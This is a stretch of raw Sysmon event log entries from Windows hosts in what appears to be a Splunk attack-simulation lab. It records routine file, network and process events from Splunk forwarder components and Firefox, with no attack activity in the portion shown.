Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=007642C02E42409D766D5144DBB5E192,SHA256=4C46E6A290417E5FB3886FA34D4C1BDB072319966B6CEF2E9C02F6705C490284,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:11.922{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2607AADF06254A3ECF3665C00DA53EC1,SHA256=0B0F933F06E11196DA04215A0843E20D27820BE086952A081BDEA8E34B3B97E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044777Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:11.502{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=797C9605F1F4D115DFF8E53D56023BB3,SHA256=B98E599528019D9E27842DF1D13A22E0E92D4FB27AA18680FA063E95650C4D51,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:08.815{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56420-false10.0.1.12-8000- 23542300x800000000000000044778Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:12.596{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B41AB260B3249A46215D2EC9A0528EE5,SHA256=DE312DA796586A663597B731F0C9E23D9EE3104559A4345DD0D5577CAB587B27,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044780Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:10.603{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52381-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044779Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:13.689{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7668CC0B631A7FB0BD90336D9BF8340E,SHA256=CCB910DAEF35393BF6A0165FA113E6105C8BBB5F6833AD1FE850E43F1A38671A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:13.052{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA8E9B52ED4FF2B7F92601C85D12201B,SHA256=BBFA42B4E271FF2C4502EDE3E3ADA59AD83B5A1CB75D39632A1AA8C49D5E28BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044781Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:14.783{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=333702F8EF952A5A524FFEAB48C03F3D,SHA256=5ED31FD31639833A7687307171A7045727DE30717DB529AC6AD0F370409D605B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:14.805{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=EDC262A9BFD23BA9C3FBC829B955918D,SHA256=6487FF605E9460FB98FCBC844838D2C0258DA31F706CC714B6D0C508B3338D5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:14.185{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFF350260F4C7992A6DE23386C9925E2,SHA256=B7CC28CAC2FA996067B97E463732564B0093DBCCACB3011D078E036B9D9E3D37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044782Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:15.877{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4585B0D2973450ADBC32389C6A5291B0,SHA256=497C508C09ABC643EEBE6B92295E3182B8E156C2EC781615644B9CD84768AA56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:15.539{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:15.539{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=156A7BF9BE9F406A68ACB3772BE0D304,SHA256=ADD894C5AFC5768821DAEC51FB4D303CA10EE15FAAF0D0C9656167DA2320AA77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:15.306{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7431AC87A3D241749581B5D2D3BCFEB,SHA256=453D8900D7D70C4593EC8F7D31F66759FF0FE3572777224469A675EDA807BF6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044783Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:16.971{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F24DAC9B0C121996546BB21A5E08A07A,SHA256=149E8EBF52D7390C7E166D617D3958AEEA02D01DB3387FDCC8E0E562A554F204,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:14.779{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56421-false10.0.1.12-8000- 23542300x8000000000000000205943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:16.323{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D00A52E2F44863DF393E5F6AD0C457C,SHA256=2B88084D40BBFBCE78A18F46C456787F3DCF539A43D61D03D9612FB18DC99D0C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.755{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18DD-629A-6242-000000005F02}8188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.755{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.755{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.755{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.755{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.755{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-18DD-629A-6242-000000005F02}8188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.755{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18DD-629A-6242-000000005F02}8188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.756{2E1864BB-18DD-629A-6242-000000005F02}8188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.455{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=ADA1EDD922C4992D19DAA5F74EF11496,SHA256=28577EA7EC92551FD1CAB9E108030F37B559F69BD3C48C8E6F0E5255377B60B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.339{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EBB20E87ACBE6DD7770E3E37B6A7F1F,SHA256=3C6E323FB3FF7D9387C083D1EBA7A6E1679E1866D12220149B8BCC09A3769AE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044784Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:15.790{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52382-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000205952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.270{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18DD-629A-6142-000000005F02}336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.270{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.270{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.270{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.270{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.270{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-18DD-629A-6142-000000005F02}336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.270{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18DD-629A-6142-000000005F02}336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:17.271{2E1864BB-18DD-629A-6142-000000005F02}336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000205976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.424{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18DE-629A-6342-000000005F02}2256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 